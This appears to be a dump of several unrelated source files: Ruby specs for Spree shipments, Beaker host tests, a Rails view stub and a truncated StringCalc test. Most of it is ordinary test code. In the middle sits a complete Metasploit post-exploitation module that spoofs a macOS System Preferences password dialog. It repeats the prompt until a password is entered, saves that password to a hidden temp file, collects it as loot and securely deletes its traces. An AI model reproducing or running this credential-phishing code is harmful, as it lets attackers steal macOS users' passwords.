it_should_behave_like 'immutable once shipped'
it_should_behave_like 'pending if backordered'
end
context "when payment is not required" do
before do
Spree::Config[:require_payment_to_ship] = false
end
it "should result in a 'ready' state" do
expect(shipment).to receive(:update_columns).with(state: 'ready', updated_at: kind_of(Time))
shipment.update_state
end
it_should_behave_like 'immutable once shipped'
it_should_behave_like 'pending if backordered'
end
context "when order has balance due" do
before { allow(order).to receive_messages paid?: false }
it "should result in a 'pending' state" do
shipment.state = 'ready'
expect(shipment).to receive(:update_columns).with(state: 'pending', updated_at: kind_of(Time))
shipment.update_state
end
it_should_behave_like 'immutable once shipped'
it_should_behave_like 'pending if backordered'
end
context "when order has a credit owed" do
before { allow(order).to receive_messages payment_state: 'credit_owed', paid?: true }
it "should result in a 'ready' state" do
shipment.state = 'pending'
expect(shipment).to receive(:update_columns).with(state: 'ready', updated_at: kind_of(Time))
shipment.update_state
end
it_should_behave_like 'immutable once shipped'
it_should_behave_like 'pending if backordered'
end
context "when shipment state changes to shipped" do
it "should call after_ship" do
shipment.state = 'pending'
expect(shipment).to receive :after_ship
allow(shipment).to receive_messages determine_state: 'shipped'
expect(shipment).to receive(:update_columns).with(state: 'shipped', updated_at: kind_of(Time))
shipment.update_state
end
# Regression test for https://github.com/spree/spree/issues/4347
context "with adjustments" do
before do
shipment.adjustments << Spree::Adjustment.create(order: order, label: "Label", amount: 5)
end
it "transitions to shipped" do
shipment.update_column(:state, "ready")
shipment.ship!
end
end
end
end
context "when order is completed" do
before do
allow(order).to receive_messages completed?: true
allow(order).to receive_messages canceled?: false
end
context "with inventory tracking" do
before { Spree::Config.set track_inventory_levels: true }
it "should validate with inventory" do
shipment.inventory_units = [create(:inventory_unit)]
expect(shipment.valid?).to be true
end
end
context "without inventory tracking" do
before { Spree::Config.set track_inventory_levels: false }
it "should validate with no inventory" do
expect(shipment.valid?).to be true
end
end
end
context "#cancel" do
it 'cancels the shipment' do
allow(shipment.order).to receive(:update!)
shipment.state = 'pending'
expect(shipment).to receive(:after_cancel)
shipment.cancel!
expect(shipment.state).to eq 'canceled'
end
it 'restocks the items' do
variant = shipment.inventory_units.first.variant
shipment.stock_location = mock_model(Spree::StockLocation)
expect(shipment.stock_location).to receive(:restock).with(variant, 1, shipment)
shipment.after_cancel
end
context "with backordered inventory units" do
let(:order) { create(:order) }
let(:variant) { create(:variant) }
let(:other_order) { create(:order) }
before do
order.contents.add variant
order.create_proposed_shipments
other_order.contents.add variant
other_order.create_proposed_shipments
end
it "doesn't fill backorders when restocking inventory units" do
shipment = order.shipments.first
expect(shipment.inventory_units.count).to eq 1
expect(shipment.inventory_units.first).to be_backordered
other_shipment = other_order.shipments.first
expect(other_shipment.inventory_units.count).to eq 1
expect(other_shipment.inventory_units.first).to be_backordered
expect {
shipment.cancel!
}.not_to change { other_shipment.inventory_units.first.state }
end
end
end
context "#resume" do
let(:inventory_unit) { create(:inventory_unit) }
before { shipment.state = 'canceled' }
context "when order cannot ship" do
before { allow(order).to receive_messages(can_ship?: false) }
it "should result in a 'pending' state" do
shipment.resume!
expect(shipment.state).to eq 'pending'
end
end
context "when order is not paid" do
before { allow(order).to receive_messages(paid?: false) }
it "should result in a 'ready' state" do
shipment.resume!
expect(shipment.state).to eq 'pending'
end
end
context "when any inventory is backordered" do
before { allow_any_instance_of(Spree::InventoryUnit).to receive(:allow_ship?).and_return(false) }
it "should result in a 'ready' state" do
shipment.resume!
expect(shipment.state).to eq 'pending'
end
end
context "when the order is paid, shippable, and not backordered" do
before do
allow(order).to receive_messages(can_ship?: true)
allow(order).to receive_messages(paid?: true)
allow_any_instance_of(Spree::InventoryUnit).to receive(:allow_ship?).and_return(true)
end
it "should result in a 'ready' state" do
shipment.resume!
expect(shipment.state).to eq 'ready'
end
end
    it 'unstocks the items' do
variant = shipment.inventory_units.first.variant
shipment.stock_location = mock_model(Spree::StockLocation)
expect(shipment.stock_location).to receive(:unstock).with(variant, 1, shipment)
shipment.after_resume
end
end
context "#ship" do
context "when the shipment is canceled" do
let(:address){ create(:address) }
let(:order){ create(:order_with_line_items, ship_address: address) }
let(:shipment_with_inventory_units) { create(:shipment, order: order, state: 'canceled') }
let(:subject) { shipment_with_inventory_units.ship! }
before do
allow(order).to receive(:update!)
allow(shipment_with_inventory_units).to receive_messages(require_inventory: false, update_order: true)
end
      it 'unstocks the items' do
expect(shipment_with_inventory_units.stock_location).to receive(:unstock).with(an_instance_of(Spree::Variant), 1, shipment_with_inventory_units)
subject
end
end
['ready', 'canceled'].each do |state|
context "from #{state}" do
before do
allow(order).to receive(:update!)
allow(shipment).to receive_messages(require_inventory: false, update_order: true, state: state)
end
it "finalizes adjustments" do
shipment.adjustments.each do |adjustment|
expect(adjustment).to receive(:finalize!)
end
shipment.ship!
end
end
end
end
context "#ready" do
# Regression test for https://github.com/spree/spree/issues/2040
it "cannot ready a shipment for an order if the order is unpaid" do
expect(order).to receive_messages(paid?: false)
expect(shipment).not_to be_can_ready
end
end
context "updates cost when selected shipping rate is present" do
let(:shipment) { create(:shipment) }
before { shipment.selected_shipping_rate.update!(cost: 5) }
it "updates shipment totals" do
expect {
shipment.update_amounts
}.to change { shipment.cost }.to(5)
end
end
context "changes shipping rate via general update" do
let!(:ship_address) { create(:address) }
let!(:tax_zone) { create(:global_zone) } # will include the above address
let!(:tax_rate) { create(:tax_rate, amount: 0.10, zone: tax_zone, tax_categories: [tax_category]) }
let(:tax_category) { create(:tax_category) }
let(:order) do
create(
:order_ready_to_ship,
ship_address: ship_address,
shipment_cost: 10,
shipping_method: ten_dollar_shipping_method,
line_items_count: 1,
line_items_price: 100,
)
end
let(:ten_dollar_shipping_method) { create(:shipping_method, tax_category: tax_category, zones: [tax_zone], cost: 10) }
let(:twenty_dollar_shipping_method) { create(:shipping_method, tax_category: tax_category, zones: [tax_zone], cost: 20) }
let(:shipment) { order.shipments[0] }
let(:twenty_dollar_shipping_rate) do
create(:shipping_rate, cost: 20, shipment: shipment, shipping_method: twenty_dollar_shipping_method)
end
it "updates everything around order shipment total and state" do
expect(shipment.state).to eq 'ready'
expect(shipment.cost).to eq 10
expect(shipment.additional_tax_total).to eq 1
expect(order.shipment_total).to eq 10
expect(order.total).to eq 121 # shipment: 10 + 1 (tax) + line item: 100 + 10 (tax)
expect(order.payment_state).to eq 'paid'
shipment.update_attributes_and_order selected_shipping_rate_id: twenty_dollar_shipping_rate.id
expect(shipment.state).to eq 'pending'
expect(shipment.cost).to eq 20
expect(shipment.additional_tax_total).to eq 2
expect(order.shipment_total).to eq 20
expect(order.total).to eq 132 # shipment: 20 + 2 (tax) + line item: 100 + 10 (tax)
expect(order.payment_state).to eq 'balance_due'
end
end
context "currency" do
it "returns the order currency" do
expect(shipment.currency).to eq(order.currency)
end
end
context "nil costs" do
it "sets cost to 0" do
shipment = Spree::Shipment.new
shipment.valid?
expect(shipment.cost).to eq 0
end
end
context "#tracking_url" do
subject { shipment.tracking_url }
context "when tracking has not yet been set" do
it { is_expected.to be nil }
end
context "when tracking has been set, but a shipping method is not present" do
before do
shipment.tracking = "12345"
shipment.shipping_rates.clear
end
it { is_expected.to be nil }
end
context "when tracking has been set and a shipping method exists" do
before do
shipment.tracking = "12345"
shipment.shipping_method.update(tracking_url: "https://example.com/:tracking")
end
it "builds the tracking url with the shipping method" do
expect(subject).to eql("https://example.com/12345")
end
end
end
context "set up new inventory units" do
# let(:line_item) { double(
let(:variant) { double("Variant", id: 9) }
let(:inventory_units) { double }
let(:params) do
{ variant_id: variant.id, state: 'on_hand', line_item_id: line_item.id }
end
before { allow(shipment).to receive_messages inventory_units: inventory_units }
it "associates variant and order" do
expect(inventory_units).to receive(:create).with(params)
shipment.set_up_inventory('on_hand', variant, order, line_item)
end
end
# Regression test for https://github.com/spree/spree/issues/3349
context "#destroy" do
let(:shipping_rate) do
Spree::ShippingRate.create!(
shipping_method: shipping_method,
selected: true,
taxes: [Spree::ShippingRateTax.new(amount: 20)]
)
end
it "destroys linked shipping_rates and shipping_rate_taxes" do
shipping_rate = shipment.shipping_rates.first
shipping_rate_tax = shipping_rate.taxes.first
shipment.destroy
expect{shipping_rate.reload}.to raise_error(ActiveRecord::RecordNotFound)
expect{shipping_rate_tax.reload}.to raise_error(ActiveRecord::RecordNotFound)
end
end
# Regression test for https://github.com/spree/spree/issues/4072 (kinda)
# The need for this was discovered in the research for https://github.com/spree/spree/issues/4702
context "state changes" do
before do
# Must be stubbed so transition can succeed
allow(order).to receive_messages paid?: true
end
it "are logged to the database" do
expect(shipment.state_changes).to be_empty
expect(shipment.ready!).to be true
expect(shipment.state_changes.count).to eq(1)
state_change = shipment.state_changes.first
expect(state_change.previous_state).to eq('pending')
expect(state_change.next_state).to eq('ready')
end
end
context "don't require shipment" do
let(:stock_location) { create(:stock_location, fulfillable: false) }
let(:unshippable_shipment) do
create(
:shipment,
stock_location: stock_location,
inventory_units: [build(:inventory_unit)]
)
end
before { allow(order).to receive_messages paid?: true }
it 'proceeds automatically to shipped state' do
unshippable_shipment.ready!
expect(unshippable_shipment.state).to eq('shipped')
end
it 'does not send a confirmation email' do
expect {
unshippable_shipment.ready!
unshippable_shipment.inventory_units.reload.each do |unit|
expect(unit.state).to eq('shipped')
end
}.not_to change{ ActionMailer::Base.deliveries.count }
end
end
context "destroy prevention" do
it "can be destroyed when pending" do
shipment = create(:shipment, state: "pending")
expect(shipment.destroy).to be_truthy
expect { shipment.reload }.to raise_error(ActiveRecord::RecordNotFound)
end
it "can be destroyed when ready" do
shipment = create(:shipment, state: "ready")
expect(shipment.destroy).to be_truthy
expect { shipment.reload }.to raise_error(ActiveRecord::RecordNotFound)
end
it "cannot be destroyed when shipped" do
shipment = create(:shipment, state: "shipped")
expect(shipment.destroy).to eq false
expect(shipment.errors.full_messages.join).to match /Cannot destroy/
expect { shipment.reload }.not_to raise_error
end
it "cannot be destroyed when canceled" do
shipment = create(:shipment, state: "canceled")
expect(shipment.destroy).to eq false
expect(shipment.errors.full_messages.join).to match /Cannot destroy/
expect { shipment.reload }.not_to raise_error
end
end
describe "#finalize!" do
let(:inventory_unit) { shipment.inventory_units.first }
let(:stock_item) { inventory_unit.variant.stock_items.find_by(stock_location: stock_location) }
before do
stock_item.set_count_on_hand(10)
stock_item.update_attributes!(backorderable: false)
inventory_unit.update_attributes!(pending: true)
end
subject { shipment.finalize! }
it "updates the associated inventory units" do
inventory_unit.update_columns(updated_at: 1.hour.ago)
expect { subject }.to change { inventory_unit.reload.updated_at }
end
it "unstocks the variant" do
expect { subject }.to change { stock_item.reload.count_on_hand }.from(10).to(9)
end
context "inventory unit already finalized" do
before do
inventory_unit.update_attributes!(pending: false)
end
it "doesn't update the associated inventory units" do
expect { subject }.to_not change { inventory_unit.reload.updated_at }
end
it "doesn't unstock the variant" do
expect { subject }.to_not change { stock_item.reload.count_on_hand }
end
end
end
describe ".by_store" do
it "returns shipments by store" do
olivanders_store = create(:store, name: 'Olivanders')
wizard_shipment = create(:shipment, order: create(:order, store: olivanders_store))
create(:shipment, order: build(:order, store: create(:store, name: 'Target')))
shipments = Spree::Shipment.by_store(olivanders_store)
expect(Spree::Shipment.count).to eq(2)
expect(shipments.count).to eq(1)
expect(shipments.first).to eq(wizard_shipment)
end
end
describe '#selected_shipping_rate_id=' do
let!(:air_shipping_method) { create(:shipping_method, name: "Air") }
let(:new_rate) { shipment.shipping_rates.create!(shipping_method: air_shipping_method) }
context 'selecting the same id' do
it 'keeps the same shipping rate selected' do
expect {
shipment.selected_shipping_rate_id = shipping_rate.id
}.not_to change { shipping_rate.selected }.from(true)
end
end
context 'when the id exists' do
it 'sets the new shipping rate as selected' do
expect {
shipment.selected_shipping_rate_id = new_rate.id
}.to change { new_rate.selected }.from(false).to(true)
end
it 'sets the old shipping rate as not selected' do
expect {
shipment.selected_shipping_rate_id = new_rate.id
}.to change { shipping_rate.selected }.from(true).to(false)
end
end
context 'when the id does not exist' do
      it 'raises an ArgumentError' do
expect {
shipment.selected_shipping_rate_id = -1
}.to raise_error(ArgumentError)
# Should not change selection
expect(shipping_rate.reload).to be_selected
end
end
end
describe "#shipping_method" do
let(:shipment) { create(:shipment) }
subject { shipment.shipping_method }
context "when no shipping rate is selected" do
before do
shipment.shipping_rates.update_all(selected: false)
shipment.reload
end
it { is_expected.to be_nil }
end
context "when a shipping rate is selected" do
it "is expected to be the shipping rate's shipping method" do
expect(shipment.shipping_method).to eq(shipment.selected_shipping_rate.shipping_method)
end
end
end
end
| 33.895282 | 158 | 0.679986 |
21d2579b9a41f50bbcacb0c3473685e64c5566e0 | 5,553 | ##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Post
include Msf::Post::File
include Msf::Auxiliary::Report
def initialize(info={})
super( update_info( info,
'Name' => 'OSX Password Prompt Spoof',
'Description' => %q{
Presents a password prompt dialog to a logged-in OSX user.
},
'License' => MSF_LICENSE,
'Author' => [
'Joff Thyer <jsthyer[at]gmail.com>', # original post module
'joev' # bug fixes
],
'Platform' => [ 'osx' ],
'References' => [
['URL', 'http://blog.packetheader.net/2011/10/fun-with-applescript.html']
],
'SessionTypes' => [ "shell", "meterpreter" ]
))
register_options([
OptString.new(
'TEXTCREDS',
[
true,
'Text displayed when asking for password',
'Type your password to allow System Preferences to make changes'
]
),
OptString.new(
'ICONFILE',
[
true,
'Icon filename relative to bundle',
'UserUnknownIcon.icns'
]
),
OptString.new(
'BUNDLEPATH',
[
true,
'Path to bundle containing icon',
'/System/Library/CoreServices/CoreTypes.bundle'
]
),
OptInt.new('TIMEOUT', [true, 'Timeout for user to enter credentials', 60])
], self.class)
end
def cmd_exec(str)
print_status "Running cmd '#{str}'..."
super
end
  # Run method, executed when the run command is issued
def run
if client.nil?
print_error("Invalid session ID selected. Make sure the host isn't dead.")
return
end
host = case session.type
when /meterpreter/
sysinfo["Computer"]
when /shell/
cmd_exec("/bin/hostname").chomp
end
print_status("Running module against #{host}")
dir = "/tmp/." + Rex::Text.rand_text_alpha((rand(8)+6))
runme = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6))
creds_osa = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6))
creds = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6))
pass_file = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6))
username = cmd_exec("/usr/bin/whoami").strip
cmd_exec("umask 0077")
cmd_exec("/bin/mkdir #{dir}")
# write the script that will launch things
write_file(runme, run_script)
cmd_exec("/bin/chmod 700 #{runme}")
# write the credentials script, compile and run
write_file(creds_osa,creds_script(pass_file))
cmd_exec("/usr/bin/osacompile -o #{creds} #{creds_osa}")
cmd_exec("#{runme} #{creds}")
print_status("Waiting for user '#{username}' to enter credentials...")
timeout = ::Time.now.to_f + datastore['TIMEOUT'].to_i
pass_found = false
while (::Time.now.to_f < timeout)
if ::File.exist?(pass_file)
print_status("Password entered! What a nice compliant user...")
pass_found = true
break
end
Rex.sleep(0.5)
end
if pass_found
password_data = read_file("#{pass_file}").strip
print_good("password file contents: #{password_data}")
passf = store_loot("password", "text/plain", session, password_data, "passwd.pwd", "OSX Password")
print_good("Password data stored as loot in: #{passf}")
else
print_status("Timeout period expired before credentials were entered!")
end
print_status("Cleaning up files in #{host}:#{dir}")
cmd_exec("/usr/bin/srm -rf #{dir}")
end
# "wraps" the #creds_script applescript and allows it to make UI calls
def run_script
%Q{
#!/bin/bash
osascript <<EOF
set scriptfile to "$1"
tell application "AppleScript Runner"
do script scriptfile
end tell
EOF
}
end
# applescript that displays the actual password prompt dialog
def creds_script(pass_file)
textcreds = datastore['TEXTCREDS']
ascript = %Q{
set filename to "#{pass_file}"
set myprompt to "#{textcreds}"
set ans to "Cancel"
repeat
try
tell application "Finder"
activate
tell application "System Events" to keystroke "h" using {command down, option down}
set d_returns to display dialog myprompt default answer "" with hidden answer buttons {"Cancel", "OK"} default button "OK" with icon path to resource "#{datastore['ICONFILE']}" in bundle "#{datastore['BUNDLEPATH']}"
set ans to button returned of d_returns
set mypass to text returned of d_returns
if ans is equal to "OK" and mypass is not equal to "" then exit repeat
end tell
end try
end repeat
try
set now to do shell script "date '+%Y%m%d_%H%M%S'"
set user to do shell script "whoami"
set myfile to open for access filename with write permission
set outstr to now & ":" & user & ":" & mypass & "
"
write outstr to myfile starting at eof
close access myfile
on error
try
close access myfile
end try
end try
}
end
# Checks if the target is OSX Server
def check_server
cmd_exec("/usr/bin/sw_vers -productName").chomp =~ /Server/
end
# Enumerate the OS Version
def get_ver
# Get the OS Version
cmd_exec("/usr/bin/sw_vers", "-productVersion").chomp
end
end
| 30.179348 | 227 | 0.599496 |
4a24df37cd7e28df9990d7378ee55830510a3b86 | 143 | require 'rails_helper'
RSpec.describe "equipment/show.html.haml", type: :view do
pending "add some examples to (or delete) #{__FILE__}"
end
| 23.833333 | 57 | 0.741259 |
b9fed6e218ecbd3e115a7d3e6de883643a55c71d | 13,088 | require "helpers/test_helper"
test_name "confirm host object behave correctly"
step "#port_open? : can determine if a port is open on hosts"
hosts.each do |host|
logger.debug "port 22 (ssh) should be open on #{host}"
assert_equal(true, host.port_open?(22), "port 22 on #{host} should be open")
logger.debug "port 65535 should be closed on #{host}"
assert_equal(false, host.port_open?(65535), "port 65535 on #{host} should be closed")
end
step "#ip : can determine the ip address on hosts"
hosts.each do |host|
ip = host.ip
# confirm ip format
logger.debug("format of #{ip} for #{host} should be correct")
assert_match(/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/, ip, "#{ip} on #{host} isn't correct format")
end
step "#is_x86_64? : can determine arch on hosts"
hosts.each do |host|
if host['platform'] =~ /x86_64|_64|amd64|-64/
assert_equal(true, host.is_x86_64?, "is_x86_64? should be true on #{host}: #{host['platform']}")
else
assert_equal(false, host.is_x86_64?, "is_x86_64? should be false on #{host}: #{host['platform']}")
end
end
step "#get_env_var : can get a specific environment variable"
hosts.each do |host|
env_prefix = 'BEAKER' + SecureRandom.hex(4).upcase
env_param1 = "#{env_prefix}_p1"
env_value1 = "#{env_prefix}_v1"
host.clear_env_var(env_param1)
host.add_env_var(env_param1,env_value1)
val = host.get_env_var(env_param1)
assert_match(/^#{env_param1}=#{env_value1}$/, val, "get_env_var can get a specific environment variable")
end
step "#get_env_var : should not match a partial env key name"
hosts.each do |host|
env_id = 'BEAKER' + SecureRandom.hex(4).upcase
# Used as a prefix
env_param1 = "#{env_id}_pre"
env_value1 = "#{env_id}_pre"
# Used as a suffix
env_param2 = "suf_#{env_id}"
env_value2 = "suf_#{env_id}"
  # Used as an infix
env_param3 = "in_#{env_id}_in"
env_value3 = "in_#{env_id}_in"
host.clear_env_var(env_param1)
host.clear_env_var(env_param2)
host.clear_env_var(env_param3)
host.add_env_var(env_param1,env_value1)
  host.add_env_var(env_param2,env_value2)
  host.add_env_var(env_param3,env_value3)
val = host.get_env_var(env_id)
assert('' == val,'get_env_var should not match a partial env key name')
end
step "#get_env_var : should not return a match from a key\'s value"
hosts.each do |host|
env_prefix = 'BEAKER' + SecureRandom.hex(4).upcase
env_param1 = "#{env_prefix}_p1"
env_value1 = "#{env_prefix}_v1"
host.clear_env_var(env_param1)
host.add_env_var(env_param1,env_value1)
val = host.get_env_var(env_value1)
assert('' == val,'get_env_var should not return a match from a key\'s value')
end
step "#clear_env_var : should only remove the specified key"
hosts.each do |host|
# Note - Must depend on `SecureRandom.hex(4)` creating a unique key as unable to depend on the function under test `clear_env_var`
env_id = 'BEAKER' + SecureRandom.hex(4).upcase
# Use env_id as a suffix
env_param1 = "p1_#{env_id}"
env_value1 = "v1_#{env_id}"
# Use env_id as a prefix
env_param2 = "#{env_id}_p2"
env_value2 = "#{env_id}_v2"
# Use env_id a key to delete
env_param3 = "#{env_id}"
env_value3 = "#{env_id}"
host.add_env_var(env_param1,env_value1)
host.add_env_var(env_param2,env_value2)
host.add_env_var(env_param3,env_value3)
host.clear_env_var(env_param3)
val = host.get_env_var(env_param1)
assert_match(/^#{env_param1}=#{env_value1}$/, val, "#{env_param1} should exist after calling clear_env_var")
val = host.get_env_var(env_param2)
assert_match(/^#{env_param2}=#{env_value2}$/, val, "#{env_param2} should exist after calling clear_env_var")
val = host.get_env_var(env_param3)
assert('' == val,"#{env_param3} should not exist after calling clear_env_var")
end
step "#add_env_var : can add a unique environment variable"
hosts.each do |host|
env_id = 'BEAKER' + SecureRandom.hex(4).upcase
env_param1 = "#{env_id}"
env_value1 = "#{env_id}"
# Use env_id as a prefix
env_param2 = "#{env_id}_pre"
env_value2 = "#{env_id}_pre"
# Use env_id as a suffix
env_param3 = "suf_#{env_id}"
env_value3 = "suf_#{env_id}"
host.clear_env_var(env_param1)
host.clear_env_var(env_param2)
host.clear_env_var(env_param3)
host.add_env_var(env_param1,env_value1)
host.add_env_var(env_param2,env_value2)
host.add_env_var(env_param3,env_value3)
val = host.get_env_var(env_param1)
assert_match(/^#{env_param1}=#{env_value1}$/, val, "#{env_param1} should exist")
val = host.get_env_var(env_param2)
assert_match(/^#{env_param2}=#{env_value2}$/, val, "#{env_param2} should exist")
val = host.get_env_var(env_param3)
assert_match(/^#{env_param3}=#{env_value3}$/, val, "#{env_param3} should exist")
end
step "#add_env_var : can add an environment variable"
hosts.each do |host|
host.clear_env_var("test")
logger.debug("add TEST=1")
host.add_env_var("TEST", "1")
logger.debug("add TEST=1 again (shouldn't create duplicate entry)")
host.add_env_var("TEST", "1")
logger.debug("add TEST=2")
host.add_env_var("TEST", "2")
logger.debug("ensure that TEST env var has correct setting")
logger.debug("add TEST=3")
host.add_env_var("TEST", "3")
logger.debug("ensure that TEST env var has correct setting")
val = host.get_env_var("TEST")
assert_match(/TEST=3(;|:)2(;|:)1$/, val, "add_env_var can correctly add env vars")
end
step "#add_env_var : can preserve an environment between ssh connections"
hosts.each do |host|
host.clear_env_var("TEST")
logger.debug("add TEST=1")
host.add_env_var("TEST", "1")
logger.debug("add TEST=1 again (shouldn't create duplicate entry)")
host.add_env_var("TEST", "1")
logger.debug("add TEST=2")
host.add_env_var("TEST", "2")
logger.debug("ensure that TEST env var has correct setting")
logger.debug("add TEST=3")
host.add_env_var("TEST", "3")
logger.debug("close the connection")
host.close
logger.debug("ensure that TEST env var has correct setting")
val = host.get_env_var("TEST")
assert_match(/TEST=3(;|:)2(;|:)1$/, val, "can preserve an environment between ssh connections")
end
step "#delete_env_var : can delete an environment"
hosts.each do |host|
logger.debug("remove TEST=3")
host.delete_env_var("TEST", "3")
val = host.get_env_var("TEST")
assert_match(/TEST=2(;|:)1$/, val, "delete_env_var can correctly delete part of a chained env var")
logger.debug("remove TEST=1")
host.delete_env_var("TEST", "1")
val = host.get_env_var("TEST")
assert_match(/TEST=2$/, val, "delete_env_var can correctly delete part of a chained env var")
logger.debug("remove TEST=2")
host.delete_env_var("TEST", "2")
val = host.get_env_var("TEST")
assert_equal("", val, "delete_env_var fully removes empty env var")
end
step "#mkdir_p : can recursively create a directory structure on a host"
hosts.each do |host|
#clean up first!
host.rm_rf("test1")
#test dir construction
logger.debug("create test1/test2/test3/test4")
assert_equal(true, host.mkdir_p("test1/test2/test3/test4"), "can create directory structure")
logger.debug("should be able to create a file in the new dir")
on host, host.touch("test1/test2/test3/test4/test.txt", false)
end
step "#do_scp_to : can copy a directory to the host with no ignores"
current_dir = File.dirname(__FILE__)
module_fixture = File.join(current_dir, "../../../fixtures/module")
hosts.each do |host|
logger.debug("can recursively copy a module over")
#make sure that we are clean on the test host
host.rm_rf("module")
host.do_scp_to(module_fixture, ".", {})
Dir.mktmpdir do |tmp_dir|
#grab copy from host
host.do_scp_from("module", tmp_dir, {})
#compare to local copy
local_paths = Dir.glob(File.join(module_fixture, "**/*")).select { |f| File.file?(f) }
host_paths = Dir.glob(File.join(File.join(tmp_dir, "module"), "**/*")).select { |f| File.file?(f) }
#each local file should have a single match on the host
local_paths.each do |path|
search_name = path.gsub(/^.*fixtures\//, '') #reduce down to the path that should match
matched = host_paths.select{ |check| check =~ /#{Regexp.escape(search_name)}$/ }
assert_equal(1, matched.length, "should have found a single instance of path #{search_name}, found #{matched.length}: \n #{matched}")
host_paths = host_paths - matched
end
assert_equal(0, host_paths.length, "there are extra paths on #{host} (#{host_paths})")
end
end
step "#do_scp_to with :ignore : can copy a dir to the host, excluding ignored patterns that DO NOT appear in the source absolute path"
current_dir = File.dirname(__FILE__)
module_fixture = File.expand_path(File.join(current_dir, "../../../fixtures/module"))
hosts.each do |host|
logger.debug("can recursively copy a module over, ignoring some files/dirs")
#make sure that we are clean on the test host
host.rm_rf("module")
host.do_scp_to(module_fixture, ".", {:ignore => ['vendor', 'Gemfile']})
Dir.mktmpdir do |tmp_dir|
#grab copy from host
host.do_scp_from("module", tmp_dir, {})
#compare to local copy
local_paths = Dir.glob(File.join(module_fixture, "**/*")).select { |f| File.file?(f) }
host_paths = Dir.glob(File.join(File.join(tmp_dir, "module"), "**/*")).select { |f| File.file?(f) }
#each local file should have a single match on the host
local_paths.each do |path|
search_name = path.gsub(/^.*fixtures\//, '') #reduce down to the path that should match
matched = host_paths.select{ |check| check =~ /#{Regexp.escape(search_name)}$/ }
re = /((\/|\A)vendor(\/|\z))|((\/|\A)Gemfile(\/|\z))/
if path !~ re
assert_equal(1, matched.length, "should have found a single instance of path #{search_name}, found #{matched.length}: \n #{matched}")
else
assert_equal(0, matched.length, "should have found no instances of path #{search_name}, found #{matched.length}: \n #{matched}")
end
host_paths = host_paths - matched
end
assert_equal(0, host_paths.length, "there are extra paths on #{host} (#{host_paths})")
end
end
step "#do_scp_to with :ignore : can copy a dir to the host, excluding ignored patterns that DO appear in the source absolute path"
current_dir = File.dirname(__FILE__)
module_fixture = File.expand_path(File.join(current_dir, "../../../fixtures/module"))
hosts.each do |host|
logger.debug("can recursively copy a module over, ignoring some sub-files/sub-dirs that also appear in the absolute path")
#make sure that we are clean on the test host
host.rm_rf("module")
host.do_scp_to(module_fixture, ".", {:ignore => ['module', 'Gemfile']})
Dir.mktmpdir do |tmp_dir|
#grab copy from host
host.do_scp_from("module", tmp_dir, {})
#compare to local copy
local_paths = Dir.glob(File.join(module_fixture, "**/*")).select { |f| File.file?(f) }
host_paths = Dir.glob(File.join(File.join(tmp_dir, "module"), "**/*")).select { |f| File.file?(f) }
#each local file should have a single match on the host
local_paths.each do |path|
search_name = path.gsub(/^.*fixtures\/module\//, '') #reduce down to the path that should match
matched = host_paths.select{ |check| check =~ /#{Regexp.escape(search_name)}$/ }
re = /((\/|\A)module(\/|\z))|((\/|\A)Gemfile(\/|\z))/
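#the ignore pattern 'module' also appears in the fixture's absolute source
#path, so strip everything up to the module root before testing the pattern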
if path.gsub(/^.*module\//, '') !~ re
assert_equal(1, matched.length, "should have found a single instance of path #{search_name}, found #{matched.length}: \n #{matched}")
else
assert_equal(0, matched.length, "should have found no instances of path #{search_name}, found #{matched.length}: \n #{matched}")
end
host_paths = host_paths - matched
end
assert_equal(0, host_paths.length, "there are extra paths on #{host} (#{host_paths})")
end
end
step "Ensure scp errors close the ssh connection" do
step 'Attempt to generate a remote file that does not exist' do
# This assert relies on the behavior of the net-scp library to
# raise an error when #channel.on_close is called, which is
# indirectly called by beaker's own SshConnection #close method.
# View the source for further info:
# https://github.com/net-ssh/net-scp/blob/master/lib/net/scp.rb
assert_raises Net::SCP::Error do
create_remote_file(default, '/tmp/this/path/cannot/possibly/exist.txt', "contents")
end
end
step 'Ensure that a subsequent ssh connection works' do
# If the ssh connection was left in a dangling state, then this #on call will hang
on default, 'true'
end
step 'Attempt to scp from a resource on the SUT that does not exist' do
# This assert relies on the behavior of the net-scp library to
# use the Dir.mkdir method in the #download_start_state method.
# See the source for further info:
# https://github.com/net-ssh/net-scp/blob/master/lib/net/scp/download.rb
assert_raises Errno::ENOENT do
scp_from default, '/tmp/path/dne/wtf/bbq', '/tmp/path/dne/wtf/bbq'
end
end
step 'Ensure that a subsequent ssh connection works' do
# If the ssh connection was left in a dangling state, then this #on call will hang
on default, 'true'
end
end
| 41.028213 | 141 | 0.697051 |
33aede2523981881811e7b320d49631d69730855 | 1,081 | module Byebug
#
# Implements the finish functionality.
#
# Allows the user to continue execution until certain frames are finished.
#
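# A usage sketch at the debugger prompt (illustrative session, not part of
# the original documentation for this command):
#
#   (byebug) finish      # run until the current frame returns
#   (byebug) finish 2    # run until two frames return (the current frame
#                        # and its caller)
#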
class FinishCommand < Command
self.allow_in_post_mortem = false
def regexp
/^\s* fin(?:ish)? (?:\s+(\S+))? \s*$/x
end
def execute
max_frames = Context.stack_size - @state.frame_pos
if @match[1]
n_frames, err = get_int(@match[1], 'finish', 0, max_frames - 1)
return errmsg(err) unless n_frames
else
n_frames = 1
end
force = n_frames.zero?
@state.context.step_out(@state.frame_pos + n_frames, force)
@state.frame_pos = 0
@state.proceed
end
class << self
def names
%w(finish)
end
def description
%(fin[ish][ n_frames] Execute until frame returns.
If no number is given, we run until the current frame returns. If a
number of frames `n_frames` is given, then we run until `n_frames`
frames return from the current position.)
end
end
end
end
| 24.568182 | 77 | 0.601295 |
e261f879966dab5fbebb4142b98c732883e0bdbb | 169 | class AddHasRequestedSwapToDayAssignments < ActiveRecord::Migration
def change
add_column :day_assignments, :has_requested_swap, :boolean, default: false
end
end
| 28.166667 | 77 | 0.816568 |
5db4453f4c736b5ae634eda088070efb250143fb | 801 | require 'minitest/autorun'
require 'string_calc/day08'
class StringCalcTest < Minitest::Test
def setup
@calc = StringCalc.new
end
def test_compute_negative_number
assert_equal(-7, @calc.compute('-7'))
end
def test_compute_addition
assert_equal 4 + 9, @calc.compute('4+9')
end
def test_compute_subtraction
assert_equal 12 - 5, @calc.compute('12-5')
end
def test_compute_multiplication
